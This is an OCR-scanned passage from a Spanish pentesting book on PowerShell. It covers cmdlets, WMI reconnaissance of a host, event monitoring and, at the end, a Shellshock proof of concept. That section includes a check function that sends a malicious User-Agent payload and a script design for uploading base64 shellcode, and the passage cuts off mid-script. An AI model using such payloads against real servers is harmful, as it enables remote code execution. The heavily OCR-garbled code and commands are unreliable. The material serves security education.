t'-*  ■:  \t)aers\bi  r.>  1  istar Atributos  mostrar  no  -directorio  c:\ 

Con  param  se  definen  los  parametros  que  se  utilizaran  en  la  funcion,  y  como  puede  visualizarse 
henc  un  potential  enorme.  Se  puede  indicar  si  el  par&metro  es  de  uso  obligatorio  o  no  con  la  clausula 
Mandatory. 

Adcmas,  se  utili/an  parametros  con  lipo  definido,  con  lo  que  se  asegura  el  uso  correcto  de  cstos 
P®tamctros,  provoeando  error  si  el  lipo  que  se  pasa  a  la  funcion  no  es  compatible. 

dcvolucion  de  valores  por  parte  de  un  script  se  realiza  de  manera  implicita  v  puede  set*  recogida 
^  variable  para  su  tratamiento  posterior. 

H  /^ors^:t>Sresaltado  =  irstarAtributos  -directorio  c:\  -mostrar  si 
C#'^Sers\bit>$  result  ado 
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12.  Administration  y  recopilacion  de  information 

F.l  usuario  puede  realizar  un  control  administrativo  sencillo  de  los  sistemas  de  forma  interactiva  o  a 
traves  del  uso  del  scripting.  La  administration  en  sistemas  Windows  esta  totalmente  implementada 
gracias  al  uso  de  la  linea  de  comandos  dc  PowerShell ,  la  cual  ofrece  un  gran  numero  de  cmdlets 
y  opciones  a  traves  de  otras  tecnologias  como,  por  ejemplo.  el  lenguaje  de  instrumentacion  WM1. 

Como  se  ha  podido  estudiar  en  el  capitulo  PowerShell  no  se  basa  solo  en  cmdlets  y  utiliza  otras 
tecnologias  para  poder  resolver  todas  las  necesidades  de  usuarios,  administradores  y  por  extension 
de  los  pentesters.  A  continuation  se  van  a  estudiar  una  serie  de  ejemplos  de  administration  basica 


que  puede  ayudar  a  recopilar  informacion  del  sistema  y  gestionarla. 

La  administration  de  procesos  y  servicios  locales  es  algo  basico  y  f  undamental  para  conti olar  lo 
que  se  esta  ejecutando  o  se  ejecutara  en  el  sistema.  Se  puede  realizar  una  inspection  o  filtration  de 
procesos  y  servicios  utilizando  los  siguientes  cmdlets : 

Cmdlet 

Description 

Get-Process 

Devuelve  un  listado  de  los  procesos  que  se  ejecutan  en  la  maquina.  Es 

posible  utilizar  ciertos  parametros  como  Id  para  especificar  el  numero  del 
PID  que  se  quiere  filtrar.  Por  supuesto  se  puede  utilizar  el  cmdlet  Where- 
Object  para  filtrar  en  funcibn  de  una  o  varias  condiciones.  Por  ejemplo, 
Get-Process  \  Where-Object  j$_.pid  gt  2000 } 

Stop-Process 

Este  cmdlet  permite  detener  un  proceso  del  sistema,  el  cual  se  puede 
especificar  a  traves  del  parametro  Name  o  —Id.  Como  ejemplo  se  mucstra 
la  parada  de  procesos  que  no  est&i  respondiendo  Get-Pmcess  \  Where- 
Ohjeet  -FillerScript  Responding  -ecj  Sfalsej  |  Stop-Process 

Get-Service 

Permite  listar  los  servicios  que  hay  en  el  sistema,  pudiendo  filtrar  el  cstado 
en  el  que  se  encuentra,  por  nombre,  etcetera.  Por  ejemplo.  para  visualizar 
los  servicios  que  se  encuentran  ejecutandose  en  el  sistema  se  puede 
lanzar  la  siguiente  instruction  Get-Service  |  Where-Object  {Sustains  -eq 

"Running"} 

Stup-Senice 

Con  este  cmdlet  sc  puede  cambiar  el  estado  de  un  servicio  dc  miming  a 

stop  

Start-Sendee 

Permite  arrancar  un  servicio  que  se  encuentra  detenido 

Restart-Service 

Permite  detener  un  serv  icio  y  volverlo  a  arrancar,  todo  ello  a  traves  de  un 
cmdlet.  Como  ejemplo  sc  mucstra  el  listado  de  servicios  que  son  filtrados 
por  servicios  que  pueden  ser  detenidos  y  se  Ueva  a  cabo  el  rcinicio.  Oil 
Sendee  |  Where-Object -FillerScript  IS  .CanS/op f  I  Restart-Service^  1 

Suspend-Service 

Permite  suspender  un  servicio  

Tablet  2.07:  Cnmamtos  para  tratamiento  de  procesos y  servicios. 
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Para  recopilar  information  acerca  de  los  sistemas  donde  el  pentester  se  encuentra  sc  puede  titilizar 
un  cindlet  muy  util  como  es  Get-WmiOhject.  Este  cmdlet  puede  acceder  a  loda  la  configuration 
fundamental  de  los  subsistemas  que  son  expuestos  mediante  el  lenguaje  de  instrumentacion  WML 
Con  este  lenguaje  se  pueden  realizar  tareas  avanzadas  con  poco  esfuerzo. 

\  continuation  se  muestran  diversos  ejemplos  de  recopilacion  de  information  que  pucdcn  resultar 
miiv  utiles  en  el  momento  de  realizar  un  script.  Estas  instrucciones  pueden  ser  utilizadas  por  un 
pentester  durante  las  primeras  fases  de  un  test  de  intrusion. 


Instruction 

Description 

Get-WmiObject  -Class  Win32 _ 
BIOS  -ComputerName . 

La  clase  Win32  BIOS  de  WMI  permite  recolectar 

information  completa  sobre  la  BIOS  del  sistema. 

Get-WmiObject  -Class  Win32 
Processor  -ComputerName . 

La  clase  Win32  Processor  de  WMI  permite  recolectar 
informacion  general  de  los  procesadores.  Es  altamente 
probable  que  se  quiera  filtrar  entre  toda  la  information 
que  reporta  esta  instruction,  por  lo  que  se  puede  utilizar 
Select-Object  para  ello?  por  ejemplo  Get-WmiObject 
-Class  Win32  Processor  -ComputerName .  |  Select-Object 
- Propem  [azj* 

Get-WmiObject  - Class  Win32 _ 
ComputerSystem 

La  clase  Win32  ComputerSystem  de  WMI  permite 
obtener  inforinacibn  del  modelo  del  equipo.  Se  pueden 
conseguir  datos  como  el  dominio,  el  nombre  dc  maquina, 
manufacturer  o  el  propietario 

Get-WmiObject  -Class 

Win32  QuickFixEngineering 
-ComputerName . 

La  clase  Win32  QuickFixEngineering  de  WMI  permite 
obtener  todas  las  revisiones  instaladas.  Esto  puede 
ser  realraente  util  para  que  el  pentester  conozca  que 
parches  hay  instalados  en  la  maquina.  Puede  resultar 
interesante  filtrar  por  alguna  propiedad  como  es  HotFLxJD 
Get-  WmiObject  -Class  Win32  QuickFixEngineering 
- ComputerName  .  -Property  Hot  Fix  Id 

< jet-WmiOhject  -Class  Win32 
OperatingSystem  -ComputerName . 

La  clase  Win32  OperatingSystem  de  WMI  permite 
recopilar  information  sobre  la  version  del  sistema 
operativo  y  los  Sendee  Pack  instalados.  Para  poder 
listar  los  usuarios  y  propietarios  locales  se  puede 
utilizar  la  instruccion  Get-WmiObject  -Class  Win32 _ 
OperatingSystem  -ComputerName  .  \  Select-Object 
-Property  NumberOfL icensedUsers,  NitmberOfUsers , 
RegisteredUser 

Get-WmiOhject  -Class  Win32 
LogicalDisk  -Filler  "DriveType  -3  " 
_ -C ompu lerN ante . 

La  clase  Win32  LogicalDisk  de  WMI  permite  recopilar 
informacion  sobre  el  espacio  en  disco  disponible 
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Instruccion 

Description 

Get-Wmi  Object  - Class  Win32 _ 
LogonSessinn  - Computer  Name . 

La  clase  Win32  LogonSession  de  WMI  permite  obtener 
informacion  sobre  las  sesiones  indiciadas  asociadas  a 
usuarios 

Tahla  2. OS:  Recopilando  informacion  con  Get-WmiObject. 


Recopilando  informacion  sobre  el  software  de  la  maquina 

El  usuario  puede  tener  acceso  a  informacion  sobre  el  software  de  la  maquina,  por  ejemplo  a  traves  del 
uso  de  la  clase  Win32 ^Product  de  WMI.  Con  el  uso  de  esta  clase  se  pueden  gestionar  las  aplicaciones 
instaladas  con  Windows  Installer ;  tanto  en  un  sistema  local  como  remoto. 

Ejecutando  la  instruction  Get-WmiObject  —Class  Win32  ^Product  —Comput  erName  .  se  puede 
obtener  un  listado  de  aplicaciones  instaladas  con  Windows  Installer.  Se  puede  obtener  informacion 
como  el  nombre  de  la  aplicacion,  la  version,  el  vendor .  etcetera.  Los  cmdlets  Select-Object  y  Where- 
Object  pueden  ayudar  al  usuario  a  filtrar  las  propiedades  que  se  necesiten. 


CPS  C:\Users\pablo>  Get-WmiObject  -Class  Win32  JPrcTOuct  -ComputerName  . 


I dent if yingNumber  s  <D5F3B0EC-A8DA-4E05-B74F-A132D61DD04D> 

Name0  -  FOCA  Free 

Uendor  :  Inf ormatica64 

tiers  ion  :  3.2.2 

Caption  :  FOCA  Free 

I  dent if  yingNumber  s  <95120000-00B9-0409-1000-0000000FFlCE> 

Name  :  Microsoft  Application  Error  Reporting 

Uendor  -  Microsoft  Corporation 

Uersion  "  12.0.6015.5000 

Caption  :  Microsoft  Application  Error  Reporting 

IdentifyingNumber  :  <90140000-0011-0000-100070000000FFlCE> 

Name  :  Microsoft  Office  Professional  Plus  2010 

Uendor  :  Microsoft  Corporation 

Uersion  =  14.0.4763.1000 

Caption  :  Microsoft  Office  Professional  Plus  2010 

I  de n  t  if  y  in gNumbe r  :  <90140000-00A1-0C0A-1000-0000000FF1CE> 

Name  :  Microsoft  Office  OneNote  MUI  <Spanish>  2010 

Uendor  :  Microsoft  Corporation 

Uersion  -  14.0.4763.1000  t 

Caption  -  Microsoft  Office  OneNote  MUI  <Spanish>  2010 


Fig.  2. 18:  Obtencion  tie  aplicaciones  instaladas  con  Window  s  Installer. 


(,Como  visualizar  que  aplicaciones  pueden  ser  desinstaladas?  No  se  puede  garantizar  de  que  se 
puedan  encontrar  todas  las  aplicaciones  del  sistema,  se  puede  buscar  todos  los  programas  que 
aparecen  en  agregar  o  quitar  programas.  Esta  caracterfstica  de  Windows  busca  estas  aplicaciones  en 
las  listas  que  se  encuentran  en  la  clave  del  registro  HK E Y_L O CA L  MA CHINES oftw are \ Micmsofi' 
Windows  Current  VersiomUninstall.  Se  puede  visualizar  los  identificadores  a  traves  de  las  claves 
de  registro  con  la  instruccion  Is  HKLM: \SOFTWARE\Microsofi  Windows  Current Version^ Uninsta  • 
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Para  listar  el  nombre  de  las  aplicaciones  que  pueden  ser  desinstaladas  se  puede  ejecutar  la  siguiente 
instruccion  Is  HKLM:\SOFTWARE\Mierosoft\Windows\  Current  Version'*  Uninsiall  |  ForEuch-Object 
. Process  {  S  .  Get  Valuer  DisplayNuwe ' ’)} .  Con  ei  cmdlet  ForEach-Object  se  puede  ir  evaluando 
cada  objeto,  los  cuales  representan  las  claves  del  registro  donde  se  encuentran  los  uninstall  de  las 
aplicaciones  instaladas.  y  mostrando  el  nombre  de  la  aplicacion. 


PS  C • \Users\pablo >  Is  HKLM :\SOFTWARE\Microsof t\Windows\CurrentUersion\Un install  ! 
•'DisplayNam6,’>  > 


Wuocera  Product  Library 
Microsoft  Office  Professional  Plus  2010 
nvacle  UM  UirtualBox  Guest  Additions  4.3.28 
WinRAR  4.20  <64-bit> 

Microsoft  -NET  Framework  4.5  „ 

Microsoft  Uisual  C++  2010  x64  Redistributable  -  10.0.40219 

utnrinws  Software  Development  Kit  for  Windows  Store  Apps  DirectX  x64  Remote 

Microsoft  Uisual  C++  2012  x64  Debug  Runtime 

p.yotal  Reports  Basic  Runtime  for  Uisual  Studio  2008  <x64> 

Microsoft  SQL  Server  2012  Data-Tier  App  Framework 
Windows  Software  Development  Kit  DirectX  x64  Remote 
Microsoft  SQL  Server  2012  Express  LocalDB 
Microsoft  SQL  Server  2012  Transact-SQL  ScriptDom 

Microsoft  Uisual  Studio  Team  Foundation  Server  2012  Object  Model 
Microsoft  SQL  Server  2012  Transact-SQL  Compiler  Service 
Microsoft  Silver light 

Microsoft  Office  Professional  Plus  2010 
Microsoft  Office  Access  MUI  <Spanish>  2010 
Microsoft  Office  Excel  MUI  <Spanish>  2010 
Microsoft  Office  PowerPoint  MUI  <Spanish>  2010 
Microsoft  Office  Publisher  MUI  <Spanish>  2010 

Microsoft  Office  Outlook  MUI  <Spanir>h)  2010 _ 


Fig  2.19-  Nomhres  de  las  aplicaciones  con  los  dcsinstaladdres  de  Windows  Install. 


La  clase  Win32 _Product  permite  instalar  aplicaciones  a  traves  de  Windows  Installer.  Si  se  requiere 
una  iiistalacion  remota  se  debe  especificar  la  ruta  de  acceso  al  paquete  .nisi  para  la  instalacion  a 
traves  de  una  ruta  de  red  UNC.  En  olras  palabras,  para  instalar  un  paquete  MSI  remoto  se  debe 
especificar  la  ruta  de  red  ServidorApiicaciones'ruta .  La  instruccion  para  reali/ar  una  instalacion  es 
(Gel-  WMI  Object  -CotnputerName  PCI  -List  |  Where- Object  - FilterScript  f$_.Name  -eq  “WinJ2_ 
Product"  I ). InvokeMethodf  "Install". " I ^Servidor Aplicaciones  \ruta\paqttete. ins i'j. 

I'ara  eiiminar  las  aplicaciones  la  instruccion  os  similar  a  la  de  instalacion.  simplemcnie  hay  que 
ejecutar  (Gel-  WmiObject  Class  Win32  Product  -Filter  "Name=  IL  Merge ' "  -CotnputerName .  J.lit 
vokeMethodf  "Uninstall  ".Snull). 


13.  WMI 

WMI,  Windows  Management  Instrumentation .  es  una  implementation  de  WBEM.  Web-Based 
Enterprise  Management.  Con  esta  tecnologia  se  pretende  el  establecimiento  de  normas  estandar 
para  el  acceso  y  recuperacion  de  la  informacion  con  caracter  administrative  de  los  componentes 
fisicos  y  logicos.  Los  recursos  administrados  son  cualquier  componente.  ya  sea  lisico  o  logico. 
que  WMI  soporte  para  su  administration.  Por  ejemplo,  un  recurso  administrado  son  los  servicios. 
proccsos.  el  subsistema  de  disco,  la  BIOS,  entre  ottos  recursos. 


76 


77 


Pentesting  con  PowerShell 


Capit"10  //•  Scripting  en  PowerShell 


El  consumidor  WMI  es  la  aplicacion  que  utiliza  la  tccnologia  WMI  para  acceder  a  la  informacion 
de  un  recurso.  Normalmente.  WMI  es  utilizado  en  scripts,  conio  por  ejemplo  javascript  o  vbs% 
pero  podri'a  ser  utilizado  por  alguna  otra  aplicacion.  Por  supuesto,  tambien  puede  scr  utilizado  en 
scripts  de  PowerShell .  Tanto  el  consumidor  WML  como  los  recursos  administrados.  interaction 
directamente  con  el  nucleo  de  WMI. 

(,Que  se  puede  hacer  con  WMI?  WMI  permite  recoger  gran  cantidad  de  informacion  sobre  el  sistema, 
actual*  sobre  partes  fisicas  o  logicas  del  sistema,  evaluar  la  eficiencia  mediante  la  toma  de  tiempos  de 
ciertos  recursos.  avisar  de  la  aparicion  de  eventos  en  el  sistema,  en  conclusion  para  la  administracion 
casi  total  del  sistema. 


Clases  e  instancias 

Las  clases  son  moides  con  ciertas  propiedades  y  metodos  o  funcionalidades.  Estos  moldes 
representan  a  los  distintos  recursos  administrados  de  WML  Uno  de  los  ejemplos  mas  claros  de  clase 
es  Win32  sendee.  la  cual  define  que  es  un  servicio  en  Windows  en  el  sentido  mas  generico  y  utiliza 
distintas  propiedades.  nombre.  cstado,  descripcion.  o  distintos  metodos,  arrancar.  parar.  etcetera. 

Las  clases  se  almacenan  en  una  base  de  datos  del  nucleo  de  WML  Las  instancias  de  una  clasc 
son  lo  que  se  eonoce  como  objeto  en  la  programacion  orientada  a  objetos.  Por  lo  que  un  recurso 
administrado  es  una  instancia  de  una  clase,  con  sus  metodos  y  propiedades.  Por  ejemplo,  los  servicios 
son  instancias  de  la  clase  Win32  service. 

En  PowerShell  se  dispone  del  ancllet  Get-  WmiOhject  el  cual  permite  obtener  informacion  sobre 
todas  las  instancias  de  una  clase  concreta.  Su  ejecucion  es  sencilla  get-wmiobject  Win32  bios.  Si  la 
clase  que  se  proporciona  al  cmdlet  dispusiera  de  varias  instancias  se  obtendra  informacion  de  todas 
el  las.  Por  ejemplo.  get-wmiobject  Win32  ^ process .  cuya  ejecucion  devuelve  todas  las  instancias,  con 
las  propiedades  de  estas. 

Para  realizar  busquedas  de  clases  respecto  a  un  patron  se  puede  utilizar  el  bucle foreach.  Una  posible 
busqueda  serta  la  siguientc:  get-wmiobject  \  foreach  jS  .name  j  Select-String  - Pattern  Win32 *).  Con 
esta  busqueda  se  obtienen  las  distintas  clases  que  comienzan  por  Win32. 

1  lay  que  tener  en  cuenta  que  no  todas  las  clases  son  almacenadas  en  el  mismo  espacio  de  nombres.  El 
nucleo  de  WMI  distribuye  las  petieiones  en  funcion  del  espacio  de  nombres  en  el  que  se  encuentren 
las  clases.  Esta  tarea  es  practicamente  transparenle  al  usuario. 

En  algunas  ocasiones  el  usuario  quiere  buscar  ciertas  propiedades  pero  no  sabe  en  que  clase,  o 
incluso  espacio  de  nombres.  esta  se  encuentra.  Para  estas  circunstancias  se  debera  realizar  una 
busqueda  por  todo  el  arbol  de  clases  de  WML 

La  idea  es  sencilla  listar  todos  objetos  WMI  con  el  ancllet  get-wmiobject,  itcrando  sobre  cada  uno 
de  cllos  obteniendo  sus  propiedades  para  irfiltrando  solo  los  que  tengan  el  patron  requerido.  Enel 
presente  ejemplo  se  requiere  listar  propiedades  que  contengan  la  palabra  disk  e  ir  obteniendo  su 


clasc  donde  se  encuentran  para  obtener  los  valores  de  dicha  propiedad.  El  eddigo  quedaria  de  la 
sieuiente  manera  get-wmiobject  —list  |  foreach  fS  .properties!  where  ($  . name  match  disk  !  \ 
select-object  origin,  name. 


Ejemplo  1:  Capacidad  de  disco 

[  w  primer  lugar  no  se  tiene  porque  saber  cual  es  la  propiedad  ni  la  clase  en  la  que  se  encuentra 
esta  informacion.  Por  lo  que,  primero,  se  realizara  una  busqueda  por  palabras.  como  se  menciono 

anteriormente. 

So  ejecuta  la  siguiente  busqueda  Get-  WmiOhjeci  -List  \  foreach  / S ^.properties f  Where- Object  !$_. 
oria"  - match  *. disk  j  |  Select-Object  origin,  name.  Se  obtienen  bastantes  propiedades  con  diversidad 
lie  clases.  Se  encuentra  la  clase  Win32 Jogicaldisk.  Hay  que  recalcar  que  se  ha  filtrado  ongenes.  es 
decir  clases.  que  contengan  la  palabra  disk ,  obteniendose  las  propiedades  de  dichas  clases. 

logicaldisk  dispone  de  propiedades  con  nombre  size  v  devicelD  para  su  identificacion. 
Sc  ejecutara  la  siguiente  instruccion  para  mostrar  la  unidad  del  dispositivo,  la  capacidad  de  este 
v  su  espacio  libre.  Get-WmiObject  Win32  logicaldisk  \  foreach  (Write-Host  $  .device ID  S  size 
$  .  frees  pace! . 


Ln  la  siguiente  imagen  se  puede  visualizar  la  salida  de  dicha  ejecucion. 


ercNbit  B3/0S/2012  10:58:57  >  Get  WniObjcct  win32_logicaldisk  !  foreach  <Write-Host  $_.deviceTD  $_.si=e  $_.fre 


Io7tt3?6427S2  63926910976 
f.2913507328  21506010048 


2147403648  625059040  v  _ 

C:MJ=ersxbit  03/05/2012  11:05:57  >  | 


Ejemplo  2:  Estado  de  los  servicios 

I  n  cste  ejemplo  se  buscara  todos  los  servicios  y  su  estado  en  la  maquina.  Para  rcalizai  la  busqueda 
se  utiliza  el  mismo  mecanismo  utilizado  en  los  ejemplos  anteriores.  Se  obtienen  distintos  orfgenes. 
pero  el  que  mas  llama  la  atencion  es  Win32  baseservice  o  Win32  service. 


Tambien  se  puede  observar  la  propiedad  state  que  proporciona  informacion  sobre  el  estado  del 
servicio  cn  la  maquina.  Una  vez  se  dispone  de  la  clase  y  la  propiedad  concreta  que  repoitaia  la 
informacion  buscada. 


M.rr-.shit  03/05/2012  11:S1:21  >  Get-WniObject  uin32_baso6erv ice  J  foreach  (l/rite-Uoot  $_.displaynane  $_.state> 
<'">Udora  do  host  compatible  con  OHCI  1394  Running 
’">Udor  Microsoft  ACPI  Running 
'  *  >Udur  do  nedidor  de  energia  ACPI  Stoppod 
i  Stopped 
.  •*“  i  Stopped 
Stopped 

Function  Driver  for  Winsock  Running 
/"  '7,  Intel  AGP  Stopped 

••to  pped 
-‘lopped 

T,..  de  filtro  de  bus  AMD  AGP  Stopped 

topped  _  _ _ 


Fig.  2.21:  Obtencion  del  estado  de  tos  servicios. 
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Monitorizacion  de  recursos 

WMI  crea  la  posibilidad  de  utilizar  los  eventos  para  la  toma  de  decisiones.  En  otras  palabras.  con 
PowerShell  y  WMI  se  pueden  gestionar  los  recursos  monitorizandolos  en  funcion  de  distintos 
eventos.  Cuando  un  evento  se  genere,  se  podra  realizar  algun  tipo  de  accion  al  respecto.  Un  ejemplo 
sencillo  seria  la  posibilidad  de  avisar  al  administrar  que  la  cuota  de  disco  ha  alcanzado  un  porcentaje 
concreto. 


a  que  clase  debc  pertenecer  la  instancia  que  se  quiere  nionitorizar.  WITHIN  indica  el  intervalo,  en 
segundos,  en  el  que  se  ejecutara  el  administrador  dc  eventos. 

[  a  sintaxis  de  una  quay  se  escribe  de  la  siguiente  manera: 

_  -nsulta  "SELECT  *  FROM  Instance  [Creation  i  Modification ;  Delation  I  Evenn 
WITHIN  5 

WHERE  Targetlnstance  ISA  'cir.stancia  de  clase>' 

[AND  Targeclnstance . propiadad  =  '<valor>']" 


(Que  es  un  evento?  Un  evento  es  una  accion  generada  por  un  recurso  el  cual  puede  disparar  una 
notificacion  que  sera  atendida  por  un  administrador.  En  esto  se  basa  el  potencial  de  la  monitorizacion 
de  recursos.  Con  estos  aplicativos,  el  administrador  puede  estar  mas  relajado  en  su  trabajo,  ya  que 
dispone  de  herramientas  que  le  ayudaran  ante  una  situacion  que  pudiera  ser  critica  si  el  administrador 
no  se  diera  cuenta. 


En  PowerShell.  version  2.  se  dispone  de  cmdlet Register-  Wmi  Event.  Este  cmdlet  permite  suscribirse 
a  los  eventos  WMI.  A  continuacion  se  especifica  algunos  de  los  parametros  mas  intcresantes  del 
cmdlet: 


Parametro 

Description 

Action 

Especifica  un  bloque  de  scripting .  es  dccir.  la  accion  que  debe 
realizarse  cuando  se  genere  el  evento 

ComputerName 

Especifica  el  nombre  de  un  equipo  remoto 

Credential 

Especifica  una  cuenta  de  usuario  con  la  que  se  realizara  la  accion 

Namespace 

Indica  el  espacio  de  nombres  de  una  clase  WMI 

Class 

Indica  la  clase  de  WMI  que  debe  generar  el  evento 

Oue/y 

Especifica  una  cotisulta  de  WML  con  lenguaje  WQL.  que 
idcntiiica  la  clase  de  eventos 

Sot  irceldentifier 

Indica  un  nombre  que  es  el  seleceionado  para  la  suscripcion 

Tablet  2.0V:  Parameiros  dc  Register- Mini  Event. 


Hay  que  recordar  que  los  corchetes  aportan  un  significado  de  opcionalidad.  Las  consultas  o  quay 
siempre  dispondran  de  un  formato  similar  al  del  ejemplo  anterior. 

Por  otro  lado,  se  especifica  la  accion  que  se  debe  llevar  a  cabo  una  vez  ocurra  el  evento.  Para 
ello  se  dispondra  de  una  variable  con  un  ScriptBlock  donde  se  especificara  que  accion  realizar. 
Fn  los  ejemplos  se  utilizara  la  salida  por  pantalla,  pero  podria  enviarse  correos  clectronicos  al 
administrador,  apagar  equipos  remotos.  acciones  administrativas  automatizadas.  o  cualquier  tipo  de 
tarea  que  se  requiera. 

Por  ultimo  se  registra  el  evento.  por  lo  que  habrfa  que  esperar  a  que  ocurriese  dicho  evento  para 
obtencr  los  resultados.  especificados  cn  la  accion. 

;  ».:cion  -  t write-host  "Acci6n  a  realizai  i ras  .a  genereciOn  del  evenio" 

:;i3ter-WmiEvent  -Query  $cons*j!ra  -Source  7  J«n.t ifier  <n ombre  :D>  -Action  3ac  .  n 

Una  vez  se  ha  esiudiado  como  registrar  eventos.  sc  va  a  estudiar  como  eiiminar  estos  eventos 
del  administrador  de  eventos.  Puede  ocurrir  que  el  administrador  quiere  eiiminar  su  regia  creada 
anteriormcntc.  Para  ello  se  dispone  del  cmdlet  Get-EventSuhscribet  Estc  cmdlet  recupera  todos  los 
eventos  registrados.  identificados  con  un  numero.  Este  numero  puede  ser  utilizado  para  eiiminar  el 
evento. 

F.n  primer  lugar,  se  ejecutara  Get-EventSnbscriha  para  obtener  cl  identificador  del  evento  que 
intcrcsa.  Despues  sc  utilizara  el  cmdlet  Unregister-Evunt  para  desregistrar  dicho  evento.  1  ejemplo 
seria,  Get-E ventSu hscrib er  -Subscription Id  <nitmero>  Unregister-Event. 


En  un  ejemplo  sencillo  se  puede  observar  varias  piezas  clave  en  el  registro  de  eventos.  Estas  piezas 
son  la  query,  la  accion  y  el  registro  o  suscripcion  a  los  eventos. 

La  query  se  construye  con  un  SELECT  y  un  FROM ,  donde  se  indica  que  se  quiere  scleccionar 

los  eventos  de  tipo _ InsfanceCivcitionEvent ,  es  dccir.  los  eventos  de  creacion  de  objetos.  En 

otras  ocasiones  pueden  interesar  otro  tipo  dc  eventos  como  de  modificacion  o  eliminacion, 

_ Instance ModificationEvent, _ InstanceDeletionEvent.  Existen  otro  tipo  de  eventos,  pero  los 

comentados  anteriormente  son  los  interesantes. 

Por  otro  lado  se  muestra  un  objetivo  o  hacia  quien  va  dirigido  con  Taiget Instance.  En  este  objeto  ^ 
o  instancia  se  puede  tambien  realizar  busquedas  en  funcion  de  las  propiedades,  muy  interesantes 
en  muchos  casos.  Tambien  hay  que  definir  el  significado  de  las  palabras  ISA  y  WITHIN.  ISA  indict 

L 


14.  Un  exploit  con  PowerShell 

El  24  de  Scpiiembre  dc  2014  se  publico  el  descubrimiento  de  una  vulnerabilidad  en  Bash,  Bourne- 
•1X01/1  Shell,  con  la  que  un  usuario  podria  ejecutar  codigo.  Esta  ejecucion  puede  ser  remota  ya  que 
muchos  procesos  invocan  a  bash  cn  su  ejecucion.  por  ejemplo  un  serv  idor  web  que  necesita  genera:* 
un  sitio  web  dinamicamcnte.  A  esta  vulnerabilidad  la  apodaron  Shellshock  y  para  muchos  tue  una 
dc  las  vulnerabilidades  mas  criticas  del  ano  2014.  ya  que  permitfa  realizar  una  ejecucion  de  eddigo 
trbitrario  en  remoto.  El  expediente  de  la  vulnerabilidad  inicial  es  CVE-201 4-627 J  descubierta 
pnr  Stephen  Chazelas .  aunque  durante  los  dias  posteriores  lueron  saliendo  publicadas  diversas 
modificacioncs. 
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iComo  funciona?  Al  final,  en  el  caso  de  un  servidor  de  internet  se  puede  necesitar  ejecutar  un 
script  de  hash  para  gcnerar  un  sic  io  web.  Este  script  puede  necesitar  informacion  externa,  cotno  por 
ejemplo  el  User  Agent.  Para  pasarlc  al  script  esta  informacion  se  hace  a  traves  de  las  variables  de 
entomo. 

La  vulnerabilidad  radica  en  que  bash  sigue  leyendo  y  ejecutando  lo  que  encuentra  despues  de  la 
definicion  de  una  funcion  en  una  variable  de  entorno.  En  la  siguiente  linea  se  define  una  funcion 
a*  varia  y  despues  se  concatenan  diversos  comandos,  los  cuales  seran  ejecutados  por  el  interprete. 
Como  ejemplo  se  presenta  la  siguiente  instruccion  envx  =  '()  { ;;  };  echo  vulnerable  ’ hash  -c  “ echo 
exp  lot  ado  ”  Bash  seguira  leyendo  dcspues  del  cuerpo  de  la  funcion,  y  ejecutara  el  codigo  que  esta 
justo  despues,  imprimiendo  por  pantalla  el  texto  vulnerable  y  explotado. 


PoC:  Explotando  Shellshock  dcsde  PowerShell 

En  esta  prueba  de  concepto  se  muestra  un  escenario  en  el  que  un  servidor  web  es  vulnerable  a 
Shellshock  por  tenor  hash  desactualizado.  El  header  User  Agent  enviado  desde  el  cliente  al  servidor 
web  es  utilizado  eomo  variable  de  entomo  para  pasarsclo  a  un  script  de  hash .  por  lo  que  se  podria 
ejecutar  comandos  sohrc  la  maquina  remota. 

El  escenario  que  se  presenta  es  el  siguiente: 

Maquina  Kali  Linux  que  es  vulnerable  a  Shellshock. 

Maquina  Windows  8  con  PowerShell  version  3. 

El  pentester  ha  evaluado  el  entorno  y  ha  encontrado  la  vulnerabilidad. 

El  script  es  paramelrizado,  por  lo  que  puede  recibir  la  direction  URL  del  servidor  que  sera  explotado. 
un  parametro  de  tipo  switch .  es  decir  un  flag  de  verdadero  o  falso.  y  un  tercer  parametro  que  sera  la 
shellcode  en  base64  que  se  quiere  subir  al  servidor  remoto  con  el  fin  de  ejecutar  dicho  codigo. 

La  ejecucion  de  este  script  se  llevarta  a  cabo  de  la  siguiente  mancra  shellshock.ps  1  -url  <direccion 
URL>  [-exploit]  base64  <she/lcode  en  base64> .  Hay  que  notar  que  el  flag  exploit  es  opcional  y  no 
obligatorio.  por  ello  se  encuentra  entre  corehetes. 

pa ram  ( 

i  Parameter  (Mandatory)  ] 
i string]  $ur'l, 

[sivitchj  $exploil.  =  S false, 

[Parameter (Mandatory) J 
f string'  $base64 

) 

La  primera  funcion  a  realizar  es  la  denominada  request  con  la  que  se  podra  realizar  las  peticiones 
maliciosas  contra  el  servidor.  La  funcion  request  esta  parametrizada  por  la  direccion  URL  que 
se  recibe  por  el  invocador  y  por  el  User  Agent,  que  sera  el  campo  que  correctamente  modificado 
permitira  la  explotacion  de  la  vulnerabilidad.  La  funcion  devuelve.  a  traves  de  la  variable  Sresponse , 
la  respuesta  obtenida. 


i 
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La  segunda  funcion  se  denomina  check  y  permite  vcrificar  si  la  maquina  remota  es  vulnerable  a 
Shellshock.  La  funcion  check  recibe  un  parametro  de  forma  obligatoria,  ya  que  se  indica  con  la 
clausula  Mandatory .  La  funcion  check  invoca  a  la  funcion  request  para  realizar  una  peticion  y  poder 
comprobar  si  la  instruccion  "echo  hola  "  es  ejecutada  en  remoto.  De  ser  ejecutada,  el  pentester 
podria  verla  reflejada  en  la  respuesta  del  servidor.  La  funcion  check  devuelve  un  valor  hooleano.  el 
cual  se  obtiene  tras  ejecutar  la  instruccion  return  (Sresponse. RmvCcmtent .  Contains  ("hola  "))  .  En 
esta  condicion  se  comprueba  si  la  respuesta  contiene  la  palabra  “hola"  o  no. 

function  request ( 
param  ( 

[Parameter (Mandatory) ' 

[string]  $url, 

[Parameter (Mandatory) . 

[string]  $userAgent 

) 

Sresponse  -  Invoke-WebReques:  Surl  -UserAgent  $ user Agent 
return  S re spouse 

I 

:  unction  check ( 
param ( 

[Parameter (Mandatory) J 
r string]  Surl 

) 

$  response  =  -ecuest  -url  Surl  -user Agent  "()  •  [;  echo;  /b  -./echo  hola" 

$  response. RawCon tent 

return  (^response. RawCon tent. Contains ("hola") ) 


Por  ultimo,  existe  un  main  en  el  que  lo  primero  que  se  hace  es  comprobar,  mediante  el  uso  de  la 
funcion  check .  si  la  maquina  remota  es  vulnerable  a  Shellshock.  En  caso  de  que  la  maquina  remota 
no  sea  vulnerable  se  final iza  la  ejecucion  del  script. 

Si  la  maquina  remota  cs  vulnerable  se  pasa  a  comprobar  si  el  flag  exploit  ha  sido  activado  en 
